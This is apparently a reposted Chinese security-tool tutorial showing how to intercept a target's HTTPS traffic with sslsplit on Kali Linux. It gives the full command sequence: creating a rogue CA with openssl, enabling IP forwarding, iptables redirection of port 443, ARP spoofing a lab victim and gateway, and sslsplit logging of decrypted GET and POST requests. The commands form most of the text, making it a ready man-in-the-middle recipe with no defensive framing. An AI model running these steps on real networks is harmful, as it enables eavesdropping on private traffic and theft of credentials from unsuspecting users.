原创:http://www.freebuf.com/sectool/48016.html
工具下载
sslsplit在kali系统中是自带的,源码下载地址如下:
https://github.com/droe/sslsplit
生成中间ssl代理证书
生成一个私钥:
openssl genrsa -out ca.key 2048然后使用私钥生成公钥证书:
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
开启IPTABLE进行端口重定向
打开ip_forward:
echo 1 > /proc/sys/net/ipv4/ip_forward设置端口重定向(将发往目标机发往443端口的转发到8443端口):
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443查看IPTABLE状态命令:
iptables -t nat -L
开启ARP欺骗
arpspoof -i eth0 -t 192.168.217.129 192.168.217.1目标机:192.168.217.129
网关:192.168.217.1
攻击192.168.217.129,欺骗目标机,本机的MAC地址就是网关192.168.217.1的MAC地址,从而将目标机的数据流都导向本机;
开启sslsplit嗅探
sslsplit主要的参数:
-k 指定私钥key文件,进行欺骗
-c 指定Root CA证书文件
-D Debug模式,用于输出SSLSplit状态,建议使用时加上
-j 指定log目录地址
-S 指定-j参数目录下需要记录截断GET、POST请求的子目录地址
-l 指定存储的连接信息文件
ssl IP 端口 指定ssl需要监听的端口
tcp IP 端口 指定tcp需要监听的端口
启动sslsplit:sslsplit -D -l connect.log -j /opt/sslsplit/test1 -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080若交互使用的是GET/PORT请求,那么每一个请求交互都会被保存在logdir目录下;